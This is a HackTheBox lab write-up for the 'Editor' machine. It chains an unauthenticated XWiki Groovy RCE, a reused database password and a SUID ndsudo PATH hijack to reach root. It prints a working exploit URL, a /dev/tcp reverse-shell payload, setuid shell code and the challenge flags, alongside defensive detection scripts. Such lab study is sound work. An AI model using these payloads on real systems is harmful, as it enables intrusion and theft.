- **Machine IP:** 10.10.11.80
- **Machine Name:** Editor
- **Difficulty:** Easy
- **Operating System:** Linux (Ubuntu 22.04.5 LTS)
---
# Table of Contents
1. Reconnaissance
2. Initial Access
3. User Flag
4. Privilege Escalation
5. Root Flag
---
# Reconnaissance
## Port Scanning
First, let's discover open ports using nmap:
```bash
nmap -sC -sV -p- 10.10.11.80 -oN editor_nmap.txt
```
Results:
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
8080/tcp open  http    Jetty 10.0.20
```
## Web Enumeration
### Port 80 (Nginx)
```bash
curl -I http://10.10.11.80
```
The website appears to be a basic landing page with minimal functionality.
### Port 8080 (XWiki)
```bash
curl -I http://10.10.11.80:8080
```
Discovery: XWiki application running on Jetty 10.0.20
```bash
# Visit the application
firefox http://10.10.11.80:8080/xwiki/
```
The application reveals:
- **XWiki Version:** 15.10.11
- **Server:** Jetty 10.0.20
---
# Initial Access
## Vulnerability Discovery
XWiki version 15.10.11 is vulnerable to CVE-2025-24893, a remote code execution vulnerability reachable through the SolrSearch RSS feed endpoint.
Vulnerability Details:
- The SolrSearch endpoint allows Groovy script injection
- Authentication is not required
- Code execution occurs as the `xwiki` user
## Exploitation
### Step 1: Test RCE with Command Execution
```bash
# URL-encoded payload to execute 'id' command
curl -s "http://10.10.11.80:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d%27id%27.execute%28%29.text%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
```
Payload Breakdown:
- `}}}{{async async=false}}{{groovy}}'id'.execute().text{{/groovy}}{{/async}}`
- The leading `}}}` breaks out of the search-term context so the rest is parsed as wiki syntax, and the Groovy macro then executes server-side
### Step 2: Establish Reverse Shell
```bash
# On attacker machine - start listener
nc -lvnp 4444
```
```bash
# Send reverse shell payload
curl -s "http://10.10.11.80:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.97/4444%200%3E%261%22%27.execute%28%29%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
```
Decoded Payload:
```
}}}{{async async=false}}{{groovy}}'bash -c "bash -i >& /dev/tcp/10.10.14.97/4444 0>&1"'.execute(){{/groovy}}{{/async}}
```
✅ Shell obtained as xwiki user
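A defender-side check for the request pattern used above, added here as an example and not part of the original writeup: it URL-decodes the `text` parameter of SolrSearch requests found in web access-log lines and flags XWiki script macros inside it, rating a hit higher when the `}}}` break-out is present. The log lines are constructed, and the macro list extends beyond `groovy` to other XWiki script macros (my assumption about what a defender would want to catch).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# XWiki script/async macro openers; a legitimate search term never contains these
MACRO_RE = re.compile(r"\{\{\s*(groovy|velocity|python|script|async)\b", re.I)
BREAKOUT_RE = re.compile(r"\}\}\}")  # closes the wrapper the search term is placed in
# Common/combined log format: client ident auth [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def inspect_request(uri):
    """Return details if a SolrSearch text= parameter carries a script macro, else None."""
    parts = urlsplit(uri)
    if "SolrSearch" not in parts.path:
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("text", []):
        decoded = unquote(value)  # second pass catches double-encoded payloads
        macros = sorted({m.lower() for m in MACRO_RE.findall(decoded)})
        if macros:
            return {"macros": macros,
                    "breakout": BREAKOUT_RE.search(decoded) is not None,
                    "text": decoded}
    return None

def scan_log(lines):
    """Parse access-log lines and return one hit per request that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, uri, status = m.groups()
        hit = inspect_request(uri)
        if hit:
            hit.update(client=client, status=int(status))
            hits.append(hit)
    return hits

# Constructed sample log lines: the writeup's 'id' probe, a benign search, an unrelated page
SAMPLE_LOG = [
    '10.10.14.97 - - [25/Oct/2025:10:01:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss'
    '&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d%27id%27.execute%28%29'
    '.text%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 1834',
    '10.10.14.5 - - [25/Oct/2025:10:01:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=meeting+notes HTTP/1.1" 200 912',
    '10.10.14.5 - - [25/Oct/2025:10:01:15 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        sev = "HIGH" if h["breakout"] else "MEDIUM"
        print(f"[{sev}] {h['client']} status={h['status']} macros={h['macros']} text={h['text']!r}")
```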
---
# User Flag
## Credential Discovery
After gaining shell access as xwiki, we need to escalate to a proper user account.
### Step 1: Explore XWiki Configuration
```bash
# Navigate to XWiki directory
cd /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF/
# Find database configuration
cat hibernate.cfg.xml
```
Database Credentials Found:
- **Username:** `xwiki`
- **Password:** `theEd1t0rTeam99`
### Step 2: Enumerate System Users
```bash
grep -E "/bin/bash|/bin/sh" /etc/passwd
```
Users with shell access:
- `root`
- `oliver`
### Step 3: SSH as Oliver
```bash
ssh oliver@10.10.11.80
# Password: theEd1t0rTeam99
```
✅ Successful login as oliver
### Step 4: Retrieve User Flag
```bash
cat ~/user.txt
```
User Flag: `76c5e3bef48029cc832ae0e0129f488b`
---
# Privilege Escalation
## Enumeration as Oliver
```bash
# Check user groups
id
```
Output:
```
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
```
🔑 Key Discovery: Oliver is a member of the netdata group!
## Netdata Privilege Escalation
### Step 1: Find SUID Binaries
```bash
find / -perm -4000 2>/dev/null
```
Interesting findings:
```
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
```
```bash
# Check permissions
ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```
Output:
```
-rwsr-x--- 1 root netdata 200576 Apr  1  2024 ndsudo
```
### Step 2: Analyze ndsudo Binary
```bash
# Test ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```
Output:
```
at least 2 parameters are needed, but 1 were given.
```
```bash
# Test with random command
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo /bin/bash
```
Output:
```
command not recognized: /bin/bash
```
Analysis:
- `ndsudo` is a SUID binary owned by root
- It only allows specific whitelisted commands
- We need to discover which commands are allowed
### Step 3: Identify Allowed Commands
Through research and testing, we discover that `nvme-list` is an allowed command in the ndsudo whitelist. It is related to NVMe storage device management.
## Exploitation via PATH Hijacking
The attack leverages:
1. ndsudo runs as root (SUID bit)
2. nvme-list is an allowed command
3. ndsudo searches for commands in the user's PATH
4. We can create a malicious binary and manipulate PATH
### Step 4: Create Malicious Binary
On your local Kali machine:
```bash
# Create exploit code
nano poc.c
```
```c
#include <unistd.h>

int main(void) {
    setuid(0);                                // Set user ID to root
    setgid(0);                                // Set group ID to root
    execl("/bin/bash", "bash", (char *)NULL); // Spawn bash shell
    return 0;
}
```
```bash
# Compile the exploit
gcc poc.c -o nvme
# Transfer to target
scp nvme oliver@10.10.11.80:/tmp/
```
### Step 5: Execute Privilege Escalation
On the target machine as oliver:
```bash
# Make binary executable
chmod +x /tmp/nvme
# Add /tmp to beginning of PATH
export PATH=/tmp:$PATH
# Execute ndsudo with nvme-list command
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
What happens:
1. ndsudo runs with root privileges (SUID)
2. It searches for nvme-list in PATH
3. Finds /tmp/nvme first (PATH hijacking)
4. Executes our malicious binary as root
5. Our binary sets UID/GID to 0 and spawns bash
✅ Root shell obtained!
```bash
# Verify root access
id
```
Output:
```
uid=0(root) gid=0(root) groups=0(root),999(netdata)
```
---
# Root Flag
```bash
cat /root/root.txt
```
Root Flag: `e169e7b0a9ddf440e288947242723354`
---
# Key Takeaways
## Vulnerabilities Exploited
1. CVE-2025-24893 - XWiki Groovy RCE via SolrSearch
   - Unauthenticated remote code execution
   - Improper input validation in RSS feed generation
2. Weak Credential Reuse
   - Database password reused for SSH authentication
   - Sensitive credentials in plaintext configuration files
3. PATH Hijacking via SUID Binary
   - `ndsudo` binary with insecure command execution
   - Whitelisted commands without absolute paths
   - User-controlled PATH environment variable
## Security Recommendations
1. Application Security:
   - Keep XWiki updated to the latest patched version
   - Disable unnecessary features like Groovy script execution
   - Implement proper input validation and sanitization
2. Credential Management:
   - Use unique, strong passwords for each service
   - Store sensitive credentials in secure vaults (e.g., HashiCorp Vault)
   - Encrypt configuration files containing credentials
   - Implement proper file permissions on configuration files
3. Privilege Escalation Prevention:
   - Audit SUID binaries regularly
   - Use absolute paths in SUID programs
   - Implement proper command whitelisting with full paths
   - Minimize group memberships and follow the principle of least privilege
   - Consider using security frameworks like AppArmor or SELinux
4. System Hardening:
   - Regular security updates and patch management
   - Remove unnecessary SUID binaries
   - Implement proper logging and monitoring
   - Use security scanning tools to identify misconfigurations
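One way to act on "audit SUID binaries regularly", added here as an example and not part of the original writeup: the classifier flags the exact shape found at ndsudo above, a root-owned SUID binary whose execute permission is limited to a single non-root group, because every member of that group (here oliver via netdata) inherits a path to root-level execution. `scan()` walks a real filesystem; the `SAMPLE` records are constructed from the `ls -la` output above so the demo runs offline.

```python
import os
import stat
from dataclasses import dataclass

@dataclass
class Finding:
    path: str
    mode: int          # permission bits only, e.g. 0o4750
    uid: int
    gid: int
    group_gated: bool  # root-owned SUID, executable by one non-root group only (the ndsudo shape)
    world_exec: bool

def classify(path, mode, uid, gid):
    """Return a Finding for a regular file with the SUID bit set, else None."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None
    world_exec = bool(mode & stat.S_IXOTH)
    group_exec = bool(mode & stat.S_IXGRP)
    group_gated = uid == 0 and gid != 0 and group_exec and not world_exec
    return Finding(path, stat.S_IMODE(mode), uid, gid, group_gated, world_exec)

def scan(root="/"):
    """Walk a filesystem tree with lstat (no symlink following) and collect SUID files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable paths are skipped, not fatal
            f = classify(full, st.st_mode, st.st_uid, st.st_gid)
            if f is not None:
                findings.append(f)
    return findings

# Constructed records modelled on the writeup's `ls -la` output (mode = type bits | perms)
SAMPLE = [
    ("/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo", 0o104750, 0, 999),  # root:netdata
    ("/usr/bin/passwd", 0o104755, 0, 0),      # ordinary world-executable SUID
    ("/usr/bin/python3", 0o100755, 0, 0),     # not SUID, must be ignored
]

def audit_sample():
    return [f for f in (classify(*rec) for rec in SAMPLE) if f is not None]

if __name__ == "__main__":
    for f in audit_sample():
        tag = "GROUP-GATED ROOT SUID" if f.group_gated else "suid"
        print(f"{tag:22} {oct(f.mode)} uid={f.uid} gid={f.gid} {f.path}")
```

Run `scan("/")` as root on a real host to get the same classification over the whole filesystem; group-gated hits deserve the closest review of which commands the binary will run and how it resolves them.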
# Attack Chain Summary
```
1. XWiki RCE (CVE-2025-24893)
   ↓
2. Shell as 'xwiki' user
   ↓
3. Credential Discovery (hibernate.cfg.xml)
   ↓
4. SSH as 'oliver' (password: theEd1t0rTeam99)
   ↓
5. Group Membership Discovery (netdata group)
   ↓
6. SUID Binary Analysis (ndsudo)
   ↓
7. PATH Hijacking with malicious binary
   ↓
8. Root Access!
```
---
# Tools Used
- `nmap` - Network reconnaissance
- `curl` - HTTP requests and exploitation
- `netcat` - Reverse shell listener
- `gcc` - Compile exploit
- `scp` - File transfer
- `strings` - Binary analysis
---
# References
- [XWiki CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
- [Netdata SUID Vulnerabilities](https://github.com/netdata/netdata/security)
- [PATH Hijacking Techniques](https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/)
- [GTFOBins - SUID Exploitation](https://gtfobins.github.io/)
---
- **Author:** Mrx0rd
- **Date:** October 25, 2025
- **Platform:** HackTheBox
- **Machine:** Editor
---
_Disclaimer: This writeup is for educational purposes only. Always obtain proper authorization before testing security vulnerabilities._